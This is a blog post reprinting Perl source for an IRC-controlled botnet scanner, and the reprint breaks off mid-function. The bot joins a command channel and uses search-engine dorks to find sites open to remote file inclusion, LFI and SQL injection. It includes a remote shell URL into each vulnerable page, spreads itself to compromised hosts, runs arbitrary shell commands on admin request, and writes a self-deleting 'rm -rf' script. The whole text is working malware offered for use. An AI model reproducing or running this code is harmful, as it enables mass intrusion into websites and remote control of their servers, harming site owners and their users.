Thursday, April 28, 2011

RFI(Remote File Inclusion)scanner v6 by Pentest

5:27 AM  Sarvesh  No comments


use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;
#######################################################
## CONFIGURATION //
#######################################################

$auth = "bjork";
$authmail = "yahoo\@bjork.com";
my $id = "http://idBOT.gif";
my $shell = "http://cmdSHELL.gif";
my $ircd = "irc.server.com";
my $port = "6667";
my $chan1 = "#kamtiez";
my $chan2 = "";
my @nickname = ("google","yahoo","abacho","alltheweb","aol","altavista","msn","euroseek","gigablast","seekport","virgilio","uol","lycos","Thom","Yorke","Jonny","Ed","obrian","Greenwood","Phil","Sellway","Collin","Bjorkish","John","Lennon","Paul","McCartney","Ringgo","Star","George","Harrison","Noah","Beatles","Injektilo","Sleepflower");
my $nick = $nickname[rand scalar @nickname];
my @admins = ("kaMtiEz");
my $sqlpidpr0c = 1;
my $rfipidpr0c = 100;

### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )

my $spread = "spreader";
my $pbot = "spreader";

my $spreadACT = 1; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled
&cheek();
my $killpwd = "beatles"; #Password to Kill the Bot
my $chidpwd = "beatles"; #Password to change the RFI Response
my $cmdpwd = "beatles"; #Password to execute commands on the server
my $secpwd = "beatles"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "beatles"; #Passowrd to enable/disable the Spread Mode

my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd != $cmdpwd;
my $badsecpwd != $secpwd;

#######################################################
## END OF CONFIGURATION //
#######################################################

$k= 0;
print q{
-------------------------------------------------------
______ ___
__ __ /__ / / __| __ __ _ _ _ _ _ ___ _ _
\ V / / / \__ \/ _/ _` | ' \| ' \/ -_) '_|
\_/ / / |___/\__\__,_|_||_|_||_\___|_|
/__/

-------------------------------------------------------
[+] Edited by bjork
[+] Contact: yahoo[at]bjork[com]
[+] *Updated to: 28/12/2008

};

open($f1le, ">", "rm.txt");
print $f1le "\#!/usr/bin/perl\n";
print $f1le "exec(\"rm -rf \*siti\* && rm rm.txt\")\;\n";
close $f1le;

@help = (
" 12,1[!] 12!response 12,0 > Test if the RFI Response is working ",
" 12,1[*] 12!chid 12,0 > Change the RFI-Response ",
" 12,1[!] 12!rfi -p 12,0 > Start the RFI Scanner ",
" 12,1[!] 12!lfi 12,0 > Start the LFI Scanner ",
" 12,1[!] 12!sql -p 12,0 > Start the SQL Injection Scanner ",
" 12,1[!] 12!mass[rfi/lfi/sql] -p 12,0 > Start the Mass Scan ",
" 12,1[*] 12!cmd 12,0 > Gives command on the Bot's shell. Ex: (!cmd id) (!cmd uname -a) ",
" 12,1[*] 12!sspread -s 12,0 > To spread on a vulnerable host. Ex: (!spread -s www.h.com/a.php?bug=) ",
" 12,1[*] 12!admin add/remove 12,0 > To add/remove a nickname to/from the admin list ",
" 12,1[*] 12/msg $nick !Sec ON/OFF -p 12,0 > To enable or disable Security Mode ",
" 12,1[*] 12/msg $nick !Spread ON/OFF -p 12,0 > To enable or disable Spread Mode ",
" 12,1[!] 12!info 12,0 > Get infos about the Bot ",
" 4,1[!!] For commands with the 12,0 [*] 4,1 you must be an Admin of the bot "
);

my $sys = `uname -a`;
my $up = `uptime`;

if ($spreadACT == 0) {
$t5 = "OFF";
}
elsif ($spreadACT == 1) {
$t5 = "ON";
}

if ($securityACT == 0) {
$y5 = "OFF";
}
elsif ($securityACT == 1) {
$y5 = "ON";
}

if (fork() == 0) {
&irc($ircd, $port, $chan1, $chan2, $nick);
}
else {
exit(0);
}

sub irc() {
my ($ircd, $port, $chan1, $chan2, $nick) = @_;
$c0n = IO::Socket::INET->new(PeerAddr => "$ircd",PeerPort => "$port",Proto => "tcp") || die "Can not connect on server!\n";
$c0n->autoflush(1);
print $c0n "NICK $nick\n";
print $c0n "USER FanKop 8 * :SCC V6 1.0\n";
print $c0n "JOIN $chan1\n";
writ1(" 12_/ Scanner ON \_>");
while ($line = <$c0n>) {

$k++;
my @word = split /\:/, $line;
my @words = split /\!/, $word[1];
my $sys = `uname -a`;
my $up = `uptime`;
@info = (
" 12,1[i] 12,0Release : 3,1Private IrcBot ",
" 12,1[i] 12,0Author : 3,1$auth - 100m tower ",
" 12,1[i] 12,0Contact : 3,1$authmail ",
" 12,1[i] 12,0Uname -a: 3,1$sys ",
" 12,1[i] 12,0Uptime : 3,1$up ",
" 12,1[i] 12,0Spread Mode: 3,1$t5 ",
" 12,1[i] 12,0Security Mode: 3,1$y5 "
);

if ($spreadACT == 0) {
$t5 = "OFF";
}
elsif ($spreadACT == 1) {
$t5 = "ON";
}

if ($securityACT == 0) {
$y5 = "OFF";
}
elsif ($securityACT == 1) {
$y5 = "ON";
}


if ($line =~ /^PING \:(.*)/) {
print $c0n "PONG :$1";
}
if ($line =~ /001/) {
print $c0n "JOIN $chan1\n";
}
if ($line =~ /PRIVMSG $chan1 :!help/) {
&help();
}
if ($line =~ /PRIVMSG $chan1 :!info/){
&info();
}
if ($line =~ /PRIVMSG $chan1 :!response/) {
&response();
}
if (($line =~ /PRIVMSG $chan1 :!chid\s+(.*)/)&&($securityACT == 0)) {
&chid($words[0],$1);
}
if (($line =~ /PRIVMSG $nick :!chid\s+(.*) -p $chidpwd/)&&($securityACT == 1)) {
&chid($words[0],$1,"a");
}
elsif (($line =~ /PRIVMSG $nick :!chid\s+(.*) -p $badidpwd/)&&($securityACT == 1)) {
pm($words[0]," 12,1[-] 12Error Changing the RFI-Response (bad Password)! ");
}
if (($line =~ /PRIVMSG $chan1 :!killme/)&&($securityACT == 0)) {
&killme($words[0]);
}
if (($line =~ /PRIVMSG $nick :!killme -p $killpwd/)&&($securityACT == 1)) {
&killme($words[0],"a");
}
elsif (($line =~ /PRIVMSG $nick :!killme -p $badkillpwd/)&&($securityACT == 1)) {
pm($words[0]," 12,1[-] 12,4Error Killing the Bot (Null or bad Password) ! ");
}
if (($line =~ /PRIVMSG $chan1 :!admin (add|remove)\s+(.*)/)&&($securityACT == 0)) {
&ch_admin($1,$words[0],$2);
}
if (($line =~ /PRIVMSG $nick :!admin (add|remove)\s+(.*) -p $chadminpwd/)&&($securityACT == 1)) {
&ch_admin($1,$words[0],$2,"a");
}
elsif (($line =~ /PRIVMSG $nick :!admin (add|remove)\s+(.*) -p $badchadminpwd/)&&($securityACT == 1)) {
pm($words[0]," 12,1[-] 12,4Error changing the Admin list (Null or bad Password) ! ");
}
if (($line =~ /PRIVMSG $chan1 :!cmd\s+(.*)/)&&($securityACT == 0)) {
&cmd($words[0],$1);
}
if (($line =~ /PRIVMSG $nick :!cmd\s+(.*) -p $cmdpwd/)&&($securityACT == 1)) {
&cmd($words[0],$1,"a");
}
elsif (($line =~ /PRIVMSG $nick :!cmd\s+(.*) -p $badcmdpwd/)&&($securityACT == 1)) {
pm($words[0]," 12,1[-] 12,4Error using the shell (Null or bad Password) ! ");
}
if ($line =~ /PRIVMSG $nick :!Sec\s+(.*) -p $secpwd/) {
&sec($words[0],$1);
}
elsif ($line =~ /PRIVMSG $nick :!Sec\s+(.*) -p $badsecpwd/) {
pm($words[0]," 12,1[-] 12,4Error changing the Security Mode (Null or bad Password) ! ");
}
if (($line =~ /PRIVMSG $chan1 :!Spread\s+(.*)/)&&($securityACT == 0)) {
&spread($words[0],$1);
}
if (($line =~ /PRIVMSG $nick :!Spread\s+(.*) -p $spreadpwd/)&&($securityACT == 1)) {
&spread($words[0],$1,"a");
}
elsif (($line =~ /PRIVMSG $nick :!Spread\s+(.*) -p $badspreadpwd/)&&($securityACT == 1)) {
pm($words[0]," 12,1[-] 12,4Error changing the Spread Mode (Null or bad Password) ! ");
}
if ($line =~ /PRIVMSG $chan1 :!sspread -s\s+(.*)/) {
&sspread($words[0],$1);
}
if (($line =~ /PRIVMSG $chan1 :!rfi\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 1)&&(fork() == 0)) {
&rfi_cheek($1,$2,$3,"s",$words[0]);
}
if (($line =~ /PRIVMSG $chan1 :!rfi\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 0)&&(fork() == 0)) {
&rfi_cheek($1,$2,$3,"j");
}
if (($line =~ /PRIVMSG $chan1 :!lfi\s+(.*?)\s+(.*)/)&&($securityACT == 1)&&(fork() == 0)) {
&lfi_cheek($1,$2,$3,"s",$words[0]);
}
if (($line =~ /PRIVMSG $chan1 :!lfi\s+(.*?)\s+(.*)/)&&($securityACT == 0)&&(fork() == 0)) {
&lfi_cheek($1,$2,"j");
}
if (($line =~ /PRIVMSG $chan1 :!sql\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 1)&&(fork() == 0)) {
&sql_cheek($1,$2,$3,"s",$words[0]);
}
if (($line =~ /PRIVMSG $chan1 :!sql\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 0)&&(fork() == 0)) {
&sql_cheek($1,$2,$3,"j");
}
if (($line =~ /PRIVMSG $chan1 :!mass\[(rfi|lfi|sql)\]\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 1)&&(fork() == 0)) {
&mass_cheek($1,$2,$3,$4,"s",$words[0]);
}
if (($line =~ /PRIVMSG $chan1 :!mass\[(rfi|lfi|sql)\]\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 0)&&(fork() == 0)) {
&mass_cheek($1,$2,$3,$4,"j");
}
}
}

sub help() {
if ($securityACT == 0) {
@help;
foreach my $e(@help){
writ1("$e");
}
}
elsif ($securityACT == 1) {
@help;
$help[1] = " 12,1[*] 12/msg $nick !chid -p 12,0 > Change the RFI-Response ";
$help[2] = " 12,1[*] 12/msg $nick !killme 12,0 > -p KILL The Bot ";
$help[8] = " 12,1[*] 12!rfi -p 12,0 > Start the RFI Scanner ";
$help[9] = " 12,1[*] 12!lfi 12,0 > Start the LFI Scanner ";
$help[10] = " 12,1[*] 12!sql -p 12,0 > Start the SQL Injection Scanner ";
$help[12] = " 12,1[*] 12!mass[rfi/lfi/sql/rce] -p 12,0 > Start the Mass Scan ";
$help[13] = " 12,1[*] 12/msg $nick !cmd -p 12,0 > Gives command on the Bot's shell. Ex: (!cmd id) (!cmd uname -a) ";
$help[14] = " 12,1[*] 12/msg $nick !spread -s -p 12,0 > To spread on a vulnerable host. Ex: (!spread -s www.h.com/a.php?bug=) ";
$help[15] = " 12,1[*] 12/msg $nick !admin add/remove -p
12,0 > To add/remove a nickname to/from the admin list ";
$help[16] = " 12,1[*] 12/msg $nick !Sec ON/OFF -p 12,0 > To enable or disable Security Mode ";
$help[17] = " 12,1[*] 12/msg $nick !Spread ON/OFF -p 12,0 > To enable or disable Spread Mode ";
$#help = 18;
writ1(" 4,1[!] Security Mode is ON. To use *commands you have to be an admin of the v6 ");
foreach my $e(@help){
writ1("$e");
}
}
}

sub info() {
@info;
foreach my $n(@info) {
writ1("$n");
}
}

sub response() {
my $re = query($id);
if ($re =~ /bjork/) {
writ1(" 7,1[+] 7,0RFI Response is working ! ");
}
else {
writ1(" 3,1[-] 3,0RFI Response is NOT working ! ");
}
}

sub chid() {
my $nick = $_[0];
my $newid = $_[1];
my $reply = $_[2];
my $val = admin($nick);
if ($val == 1) {
$id = $newid;
if ($reply =~ /a/) {
pm($nick, " 12,1[+] 12New RFI Response: $id ");
}
writ1(" 12,1[+] 12RFI Response changed ! ");
writ1(" 12,1[+] 12New RFI Response: $id ");
}
else {
pm($nick," 4,1[!] You are not authorized to execute this command! ");
}
}

sub killme() {
my $nick = $_[0];
my $reply = $_[1];
my $val = admin($nick);
if ($reply =~ /a/) {
if ($val == 1) {
pm($nick, " 12,1[!] 12,4Bye Bye ! ");
writ1(" 12,1[!] 12,4Bye Bye ! ");
print $c0n "QUIT";
exec("perl rm.txt && pkill perl \n");
}
}
else {
if ($val == 1) {
writ1(" 12,1[!] 12,4Bye Bye ! ");
print $c0n "QUIT";
exec("perl rm.txt && pkill perl \n");
}
else {
writ1(" 4,1[!] You are not authorized to execute this command! ");
}
}
}

sub ch_admin() {
@admins;
my $command = $_[0];
my $nick = $_[1];
my $nick2 = $_[2];
my $mode = $_[3];
my $val = admin($nick);
if ($val == 1) {
if ($command =~ /add/) {
if ($mode =~ /a/) {
pm($nick," 12,1[+] 3$nick2 added in the Admin List!! ");
}
push(@admins, $nick2);
writ1(" 12,1[+] 3$nick added $nick2 in the Admin List!! ");
}
elsif ($command =~ /remove/) {
$t_adm = scalar(@admins);
foreach my $a(@admins){
if ($a eq $nick2) {
$l = $t_adm +1;
$a = $a[$l];
$#admins = $t_adm;
}
}
if ($mode =~ /a/) {
pm($nick," 12,1[+] 3$nick2 removed from the Admin List!! ");
}
writ1(" 12,1[+] 3$nick removed $nick2 from the Admin List!! ");
}
}
else {
pm($nick," 4,1[!] You are not authorized to execute this command! ");
}
}

sub cmd() {
my $nick = $_[0];
my $cmd = $_[1];
my $reply = $_[2];
my $val = admin($nick);
if ($val == 1) {
if ($reply =~ /a/) {
if ($cmd =~ /cd (.*)/) {
chdir($1) || pm($nick,"Can't change dir");
#return;
}
my @output = `$cmd`;
my $count = 0;
foreach my $out(@output) {
$count++;
if ($count == 10) {
sleep(3);
$count = 0;
}
pm($nick," 12,1[+] 7,1$out ");
}
}
else {
if ($cmd =~ /cd (.*)/) {
chdir($1) || writ1("Can't change dir");
#return;
}
my @output = `$cmd`;
my $count = 0;
foreach my $out(@output) {
$count++;
if ($count == 10) {
sleep(3);
$count = 0;
}
writ1(" 12,1[+] 7,1$out ");
}
}
}
else {
pm($nick," 4,1[!] You are not authorized to execute this command! ");
}
}

sub sec() {
my $nick = $_[0];
my $mode = $_[1];
my $val = admin($nick);
if ($val == 1) {
if ($mode =~ /ON/) {
$securityACT = 1;
sleep(2);
pm($nick," 12,1[+] 3Security Mode Activated !! ");
writ1(" 12,1[+] 3Security Mode Activated !! ");
}
elsif ($mode =~ /OFF/) {
$securityACT = 0;
sleep(2);
pm($nick," 12,1[+] 12,4Security Mode Disabled !! ");
writ1(" 12,1[+] 12,4Security Mode Disabled !! ");
}
}
}

sub spread() {
my $nick = $_[0];
my $mode = $_[1];
my $reply = $_[2];
my $val = admin($nick);
if ($val == 1) {
if ($mode =~ /ON/) {
$spreadACT = 1;
sleep(2);
if ($reply =~ /a/) {
pm($nick, " 12,1[+] 3Spread Mode Activated !! ");
}
writ1(" 12,1[+] 3Spread Mode Activated !! ");
}
elsif ($mode =~ /OFF/) {
$spreadACT = 0;
sleep(2);
if ($reply =~ /a/) {
pm($nick, " 12,1[+] 12,4Spread Mode Disabled !! ");
}
writ1(" 12,1[+] 12,4Spread Mode Disabled !! ");
}
}
else {
pm($nick," 4,1[!] You are not authorized to execute this command! ");
}
}

sub sspread() {
my $nick = $_[0];
my $host = $_[1];
my $val = admin($nick);
if ($val == 1) {
my $host =~ s/http:\/\///;
writ1(" 12,1[+] 12Trying to spread on $host .. ");
my $tspread = "http://".$host.$spread."?";
&query($tspread);
}
else {

writ1(" 4,1[!] You are not authorized to execute this command! ");
}
}

sub rfi_cheek() {
my $bug = $_[0];
my $dork = $_[1];
my $rfipid = $_[2];
my $chek = $_[3];
my $nick = $_[4];
if ($chek =~ /j/) {
&rfi_scan($bug, $dork, $rfipid);
}
elsif ($chek =~ /s/) {
my $val = admin($nick);
if ($val == 1) {
&rfi_scan($bug, $dork, $rfipid);
}
else {
writ1(" 4,1[!] You are not authorized to execute this command! ");
}
}
}

sub rfi_scan() {
my $bug = $_[0];
my $dork = $_[1];
my $rfipid = $_[2];
writ1(" 4,1[*] 12RFI Scan started -> $rfipid sites/process ");
writ1(" 12,1[+] Bug: $bug ");
$d0rk = clean($dork);
writ1(" 4,1[+] Dork: $d0rk ");
my $a = $k . "a";
my $n4me = $a . "siti.txt";
find($d0rk, $n4me);
rfi($bug, $n4me, $d0rk, $rfipid);
writ1(" 4,1[-] RFI Scan finished 12 > 12,0 $d0rk ");
exit(0);
}

sub lfi_cheek() {
my $bug = $_[0];
my $dork = $_[1];
my $chek = $_[2];
my $nick = $_[3];
if ($chek =~ /j/) {
&lfi_scan($bug, $dork);
}
elsif ($chek =~ /s/) {
my $val = admin($nick);
if ($val == 1) {
&lfi_scan($bug, $dork);
}
else {
writ1(" 4,1[!] You are not authorized to execute this command! ");
}
}
}

sub lfi_scan() {
my $bug = $_[0];
my $dork = $_[1];
writ1(" 4,1[*] 7,1LFI Scan started ");
writ1(" 12,1[+] Bug: $bug ");
$d0rk = clean($dork);
writ1(" 4,1[+] Dork: $d0rk ");
my $b = $k . "b";
my $n4me = $b . "siti.txt";
find($d0rk, $n4me);
lfi($bug, $n4me, $d0rk);
writ1(" 4,1[-] LFI Scan finished 12 > 12,0 $d0rk ");
exit(0);
}

sub sql_cheek() {
my $bug = $_[0];
my $dork = $_[1];
my $sqlpid = $_[2];
my $chek = $_[3];
my $nick = $_[4];
if ($chek =~ /j/) {
&sql_scan($bug, $dork, $sqlpid);
}
elsif ($chek =~ /s/) {
my $val = admin($nick);
if ($val == 1) {
&sql_scan($bug, $dork, $sqlpid);
}
else {
writ1(" 4,1[!] You are not authorized to execute this command! ");
}
}
}

sub sql_scan() {
my $bug = $_[0];
my $dork = $_[1];
my $sqlpid = $_[2];
writ1(" 4,1[*] 12,0SQL Inj Scan started -> $sqlpid sites/process ");
writ1(" 12,1[+] Bug: $bug ");
$d0rk = clean($dork);
writ1(" 4,1[+] Dork: $d0rk ");
my $c = $k . "c";
my $n4me = $c . "siti.txt";
find($d0rk, $n4me);
sql($bug, $n4me, $d0rk, $sqlpid);
writ1(" 4,1[-] SQL Scan finished 12 > 12,0 $d0rk ");
exit(0);
}

sub mass_cheek() {
my $kind = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $mpid = $_[3];
my $chek = $_[4];
my $nick = $_[5];
if ($chek =~ /j/) {
&mass_scan($kind, $bug, $dork, $mpid);
}
elsif ($chek =~ /s/) {
my $val = admin($nick);
if ($val == 1) {
&mass_scan($kind, $bug, $dork, $mpid);
}
else {
writ1(" 4,1[!] You are not authorized to execute this command! ");
}
}
}

sub mass_scan() {
my $kind = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $mpid = $_[3];
my @engine;
my $c = $k."MASS";
my $n4me = $c."siti.txt";
my $g = $k."G"; my $a = $k."A"; my $y = $k."Y"; my $m = $k."M";
my $gname = $g."siti.txt";
my $aname = $a."siti.txt";
my $yname = $y."siti.txt";
my $mname = $m."siti.txt";
my $gtest = ("www.google.com/search?q=hi&hl=en&start=10&sa=N");
my $ytest = ("http://it.search.yahoo.com/search?p=ciao&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=0&vf=all&vm=r&fl=0&fr=yfp-t-501&pstart=1&b=0");
my $re = query1($gtest); my $re2 = query($ytest);
if (($re !~ /Google Home/)&&($re2 !~ /
1 - 100 di circa/)) {
writ1(" 4,1[*] 12,1MASS[ 12$kind 12,1] SCAN STARTED ON ALLTHEWEB/MSN (Google&Yahoo banned) -> $mpid sites/process ");
writ1(" 12,1[+] Bug: $bug ");
writ1(" 4,1[+] Dork: $dork ");
$engine[0] = fork();
if ($engine[0] == 0) {
&M_Super($dork, $mname);
exit(0);
}
$engine[1] = fork();
if ($engine[1] == 0) {
&A_Super($dork, $aname);
exit(0);
}
foreach my $e(@engine){
waitpid($e,0);
}
open($file, ">>", $n4me); open(Alltheweb,"<",$aname); open(Msn,"<",$mname); foreach my $e(){
print $file "$e\n";
}
foreach my $e(){
print $file "$e\n";
}
close(Alltheweb); close(Msn); close($file);
remove($aname,$mname);
}
elsif (($re =~ /Google Home/)&&($re2 !~ /
1 - 100 di circa/)) {
writ1(" 4,1[*] 12,1MASS[ 12$kind 12,1] SCAN STARTED ON GOOGLE/ALLTHEWEB/MSN (Yahoo banned) -> $mpid sites/process ");
writ1(" 12,1[+] Bug: $bug ");
writ1(" 4,1[+] Dork: $dork ");
$engine[0] = fork();
if ($engine[0] == 0) {
&G_Super($dork, $gname);
exit(0);
}
$engine[1] = fork();
if ($engine[1] == 0) {
&M_Super($dork, $mname);
exit(0);
}
$engine[2] = fork();
if ($engine[2] == 0) {
&A_Super($dork, $aname);
exit(0);
}
foreach my $e(@engine){
waitpid($e,0);
}
open($file, ">>", $n4me); open(Google,"<",$gname); open(Alltheweb,"<",$aname); open(Msn,"<",$mname); foreach my $e(){
print $file "$e\n";
}
foreach my $e(){
print $file "$e\n";
}
foreach my $e(){
print $file "$e\n";
}
close(Alltheweb); close(Google); close(Msn); close($file);
remove($gname,$aname,$mname);
}
elsif (($re !~ /Google Home/)&&($re2 =~ /
1 - 100 di circa/)) {
writ1(" 4,1[*] 12,1MASS[ 12$kind 12,1] SCAN STARTED ON ALLTHEWEB/YAHOO/MSN (Google banned) -> $mpid sites/process ");
writ1(" 12,1[+] Bug: $bug ");
writ1(" 4,1[+] Dork: $dork ");
$engine[0] = fork();
if ($engine[0] == 0) {
&Y_Super($dork, $yname);
exit(0);
}
$engine[1] = fork();
if ($engine[1] == 0) {
&M_Super($dork, $mname);
exit(0);
}
$engine[2] = fork();
if ($engine[2] == 0) {
&A_Super($dork, $aname);
exit(0);
}
foreach my $e(@engine){
waitpid($e,0);
}
open($file, ">>", $n4me); open(Yahoo,"<",$yname); open(Alltheweb,"<",$aname); open(Msn,"<",$mname); foreach my $e(){
print $file "$e\n";
}
foreach my $e(){
print $file "$e\n";
}
foreach my $e(){
print $file "$e\n";
}
close(Alltheweb); close(Yahoo); close(Msn); close($file);
remove($yname,$aname,$mname);
}
elsif (($re =~ /Google Home/)&&($re2 =~ /
1 - 100 di circa/)) {
writ1(" 4,1[*] 12,1MASS[ 12$kind 12,1] SCAN STARTED ON GOOGLE, ALLTHEWEB, YAHOO, MSN -> $mpid sites/process ");
writ1(" 12,1[+] Bug: $bug ");
writ1(" 4,1[+] Dork: $dork ");
$engine[0] = fork();
if ($engine[0] == 0) {
&G_Super($dork, $gname);
exit(0);
}
$engine[1] = fork();
if ($engine[1] == 0) {
&Y_Super($dork, $yname);
exit(0);
}
$engine[2] = fork();
if ($engine[2] == 0) {
&M_Super($dork, $mname);
exit(0);
}
$engine[3] = fork();
if ($engine[3] == 0) {
&A_Super($dork, $aname);
exit(0);
}
foreach my $e(@engine){
waitpid($e,0);
}
open($file, ">>", $n4me); open(Google,"<", $gname); open(Yahoo,"<",$yname); open(Alltheweb,"<",$aname); open(Msn,"<",$mname); foreach my $e(){
print $file "$e\n";
}
foreach my $e(){
print $file "$e\n";
}
foreach my $e(){
print $file "$e\n";
}
foreach my $e(){
print $file "$e\n";
}
close(Alltheweb); close(Yahoo); close(Google); close(Msn); close($file);
remove($yname,$aname,$gname,$mname);
}
foreach my $e(@engine){
waitpid($e,0);
}
sleep(5);
if ($kind =~ /rfi/) {
rfi($bug, $n4me, $dork, $mpid);
}
elsif ($kind =~ /lfi/) {
lfi($bug, $n4me, $dork);
}
elsif ($kind =~ /sql/) {
sql($bug, $n4me, $dork, $mpid);
}
writ1(" 4,1[-] 12,1MASS[ 12$kind 12,1] SCAN FINESHED 12 > 12,0 $dork ");
exit(0);
}

sub find() {
my $dork = $_[0];
my $name = $_[1];
my @engine;
$engine[0] = fork();
if ($engine[0] == 0) {
my @google = google($dork, $name);
writ1(" 12,1[~] 7,1>GOOGLE : ". scalar(@google). " 12 > 12,0 $dork ");
exit(0);
}
$engine[1] = fork();
if ($engine[1] == 0) {
my @allthewebe = alltheweb($dork, $name);
writ1(" 12,1[~] 7,1>ALLTHEWEB : ". scalar(@allthewebe). " 12 > 12,0 $dork ");
exit(0);
}
$engine[2] = fork();
if ($engine[2] == 0) {
my @altavista = altavista($dork, $name);
writ1(" 12,1[~] 7,1>ALTAVISTA : ". scalar(@altavista). " 12 > 12,0 $dork ");
exit(0);
}
$engine[3] = fork();
if ($engine[3] == 0) {
my @msn = msn($dork, $name);
writ1(" 12,1[~] 7,1>MSN : ". scalar(@msn). " 12 > 12,0 $dork ");
exit(0);
}
$engine[4] = fork();
if ($engine[4] == 0) {
my @yahoo = yahoo($dork, $name);
writ1(" 12,1[~] 7,1>YAHOO : ". scalar(@yahoo). " 12 > 12,0 $dork ");
exit(0);
}
$engine[5] = fork();
if ($engine[5] == 0) {
my @gigablast = gigablast($dork,$name);
writ1(" 12,1[~] 7,1>GIGABLAST : ".scalar(@gigablast)." 12 > 12,0 $dork ");
exit(0);
}
$engine[6] = fork();
if ($engine[6] == 0) {
my @ask = ask($dork, $name);
writ1(" 12,1[~] 7,1>ASK : ". scalar(@ask). " 12 > 12,0 $dork ");
exit(0);
}
$engine[7] = fork();
if ($engine[7] == 0) {
my @dmoz = dmoz($dork,$name);
writ1(" 12,1[~] 7,1>DMOZ : ".scalar(@dmoz)." 12 > 12,0 $dork ");
exit(0);
}
$engine[8] = fork();
if ($engine[8] == 0) {
my @webde = webde($dork,$name);
writ1(" 12,1[~] 7,1>WEB.DE : ". scalar(@webde). " 12 > 12,0 $dork ");
exit(0);
}
$engine[9] = fork();
if ($engine[9] == 0) {
my @einet = einet($dork,$name);
writ1(" 12,1[~] 7,1>EINET : ".scalar(@einet)." 12 > 12,0 $dork ");
exit(0);
}
$engine[10] = fork();
if ($engine[10] == 0) {
my @uol = uol($dork,$name);
writ1(" 12,1[~] 7,1>UOL : ".scalar(@uol)." 12 > 12,0 $dork ");
exit(0);
}
$engine[11] = fork();
if ($engine[11] == 0) {
my @abacho = abacho($dork,$name);
writ1(" 12,1[~] 7,1>ABACHO : ".scalar(@abacho)." 12 > 12,0 $dork ");
exit(0);
}
$engine[12] = fork();
if ($engine[12] == 0) {
my @trovatore = trovatore($dork,$name);
writ1(" 12,1[~] 7,1>TROVATORE : ".scalar(@trovatore)." 12 > 12,0 $dork ");
exit(0);
}
$engine[13] = fork();
if ($engine[13] == 0) {
my @lycos = lycos($dork,$name);
writ1(" 12,1[~] 7,1>LYCOS : ".scalar(@lycos)." 12 > 12,0 $dork ");
exit(0);
}
$engine[14] = fork();
if ($engine[14] == 0) {
my @walhello = walhello($dork,$name);
writ1(" 12,1[~] 7,1>WALHELLO : ".scalar(@walhello)." 12 > 12,0 $dork ");
exit(0);
}
$engine[15] = fork();
if ($engine[15] == 0) {
my @virgilio = virgilio($dork, $name);
writ1(" 12,1[~] 7,1>VIRGILIO : ". scalar(@virgilio). " 12 > 12,0 $dork ");
exit(0);
}
$engine[16] = fork();
if ($engine[16] == 0) {
my @mamma = mamma($dork, $name);
writ1(" 12,1[~] 7,1>MAMMA : ". scalar(@mamma). " 12 > 12,0 $dork ");
exit(0);
}
$engine[17] = fork();
if ($engine[17] == 0) {
my @hotbot = hotbot($dork, $name);
writ1(" 12,1[~] 7,1>HOTBOT : ". scalar(@hotbot). " 12 > 12,0 $dork ");
exit(0);
}
$engine[18] = fork();
if ($engine[18] == 0) {
my @clusty = clusty($dork, $name);
writ1(" 12,1[~] 7,1>CLUSTY : ". scalar(@clusty). " 12 > 12,0 $dork ");
exit(0);
}
$engine[19] = fork();
if ($engine[19] == 0) {
my @webcrawler = webcrawler($dork, $name);
writ1(" 12,1[~] 7,1>WEBCRAWLER : ". scalar(@webcrawler). " 12 > 12,0 $dork ");
exit(0);
}
$engine[20] = fork();
if ($engine[20] == 0) {
my @fazzle = fazzle($dork, $name);
writ1(" 12,1[~] 7,1>FAZZLE : ". scalar(@fazzle). " 12 > 12,0 $dork ");
exit(0);
}
$engine[21] = fork();
if ($engine[21] == 0) {
my @about = about($dork, $name);
writ1(" 12,1[~] 7,1>ABOUT : ". scalar(@about). " 12 > 12,0 $dork ");
exit(0);
}
$engine[22] = fork();
if ($engine[22] == 0) {
my @netscape = netscape($dork, $name);
writ1(" 12,1[~] 7,1>NETSCAPE : ". scalar(@netscape). " 12 > 12,0 $dork ");
exit(0);
}
$engine[23] = fork();
if ($engine[23] == 0) {
my @infospace = infospace($dork, $name);
writ1(" 12,1[~] 7,1>INFOSPACE : ". scalar(@infospace). " 12 > 12,0 $dork ");
exit(0);
}
$engine[24] = fork();
if ($engine[24] == 0) {
my @fireball = fireball($dork, $name);
writ1(" 12,1[~] 7,1>FIREBALL : ". scalar(@fireball). " 12 > 12,0 $dork ");
exit(0);
}
foreach my $e(@engine){
waitpid($e,0);
}

}

sub rfi() {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my $rfipid = $_[3];
my @forks;
my $num = 0;
open($file, "<", $name); while (my $a = <$file>) {
$a =~ s/\n//g;
push(@tot,$a);
}
close($file);
remove($name);
my @toexploit = unici(@tot);
writ1(" 12,1[*] 4,1>EXPLOITABLES: 3,1 ".scalar(@toexploit)." 12,0 $dork ");
sleep(1);
writ1(" 4,1[+] 12ExPLoItIng STARTED !! ");
foreach my $site(@toexploit) {
my $test = "http://".$site.$bug.$id."??";
$count++;
if ($count % $rfipid == 0) {
foreach my $f(@forks){
waitpid($f,0);
}
$num = 0;
}
if($count %100 == 0){
writ1(" 12,1[%] 12,0 _/ Exploiting 4,1 ".$count." / 4,1 ".scalar(@toexploit)." ");
}
$forks[$num]=fork();
if($forks[$num] == 0){
my $test = "http://".$site.$bug.$id."??";
my $print = "http://".$site.$bug.$shell."?";
my $re = query($test);
if ($re =~ /bjork/ && $re =~ /uid=/) {
os($test);
writ1(" 12,1( 3safe: OFF 12) ( 3os: $os 12) 3$print ");
writ1(" 12,1( 3uname -a 12) 12 $un ");
writ1(" 12,1( 3uid / gid 12) 12 $id1 ");
writ1(" 12,1( 3hdd space 12) 12 free: ($free) used: ($used) tot: ($all) ");
writ2("");
writ2(" 12,1( 3safe: OFF 12) ( 3os: $os 12) 3$print ");
